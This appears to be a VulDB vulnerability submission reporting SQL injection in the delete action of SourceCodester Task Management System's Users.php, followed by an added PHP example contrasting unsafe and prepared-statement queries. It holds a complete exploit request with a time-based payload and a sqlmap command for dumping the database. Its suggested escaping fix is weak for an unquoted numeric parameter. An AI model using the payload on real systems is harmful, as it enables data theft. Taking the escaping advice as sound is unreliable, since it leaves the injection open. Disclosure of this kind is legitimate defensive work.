Submit #229400: SourceCodester Task Management System POST sql injection in Users.php info

Title: SourceCodester Task Management System POST sql injection in Users.php
Description: I find a SQL injection vulnerability in the SourceCodester Task Management System (https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html).

    POST /php-trs/classes/Users.php?f=delete HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 18
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/php-trs/admin/?page=user/list
    Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=34ls3fdfoq2kd1sevq1fr3pg68
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    id=-1 or sleep(5)#

Then you will notice that the server's response time has obviously become longer, and this proves that our SQL statement was successfully executed. Then you can save the request packet as 1.txt and use sqlmap to inject it. The command is `sqlmap -r 1.txt --data="id=-1"`, and then you can successfully drag the library.

The vulnerability stems from not adequately filtering the controllable parameter id when using the code `UPDATE users set data where id = {id}'`. This oversight leaves the system open to potential SQL injection attacks. To rectify this issue, I suggest safeguarding the id parameter against malicious exploitation through the use of mysqli_real_escape_string().
Source: https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
User: susu2023 (UID 57300)
Submission: 10/28/2023 04:41 (3 years ago)
Moderation: 10/28/2023 08:26 (4 hours later)
Status: Accepted
VulDB entry: 243800 [SourceCodester Task Reminder System 1.0 Users.php?f=delete ID sql injection]
Points: 20
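As an added example (not the Task Management System's own code), the string-built delete pattern the report describes is shown next to a hardened handler that validates id as an integer and binds it through a mysqli prepared statement instead of escaping it. The table name `users`, the column `id`, the `$conn` handle and the database credentials are assumed.

```php
<?php
// Added example, not code from the SourceCodester project.
// Assumed: table `users` with integer primary key `id`, a mysqli handle $conn.

// Pattern described in the report: the request parameter is spliced straight
// into the SQL text, so any non-numeric value alters the statement itself.
function delete_user_unsafe(mysqli $conn, string $id): bool
{
    $sql = "DELETE FROM `users` WHERE id = {$id}";   // id controlled by the client
    return $conn->query($sql) !== false;
}

// Hardened version: reject anything that is not a positive integer, then bind
// the value as a parameter so the database never parses it as SQL.
function delete_user_safe(mysqli $conn, string $rawId): bool
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);       // malformed id: refuse, do not guess
        return false;
    }
    $stmt = $conn->prepare("DELETE FROM `users` WHERE id = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('i', $id);       // 'i' forces an integer binding
    $ok = $stmt->execute() && $stmt->affected_rows > 0;
    $stmt->close();
    return $ok;
}

// Handler shape for the f=delete action: id arrives in the POST body.
if (isset($_POST['id'])) {
    $conn = new mysqli('localhost', 'db_user', 'db_pass', 'task_db'); // assumed credentials
    $conn->set_charset('utf8mb4');
    echo delete_user_safe($conn, (string) $_POST['id']) ? 1 : 0;
}
```

With the bound parameter, a body such as the one in the report fails the integer check and is rejected with HTTP 400 before any query runs, and even a value that passed validation could only ever be compared as a number.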
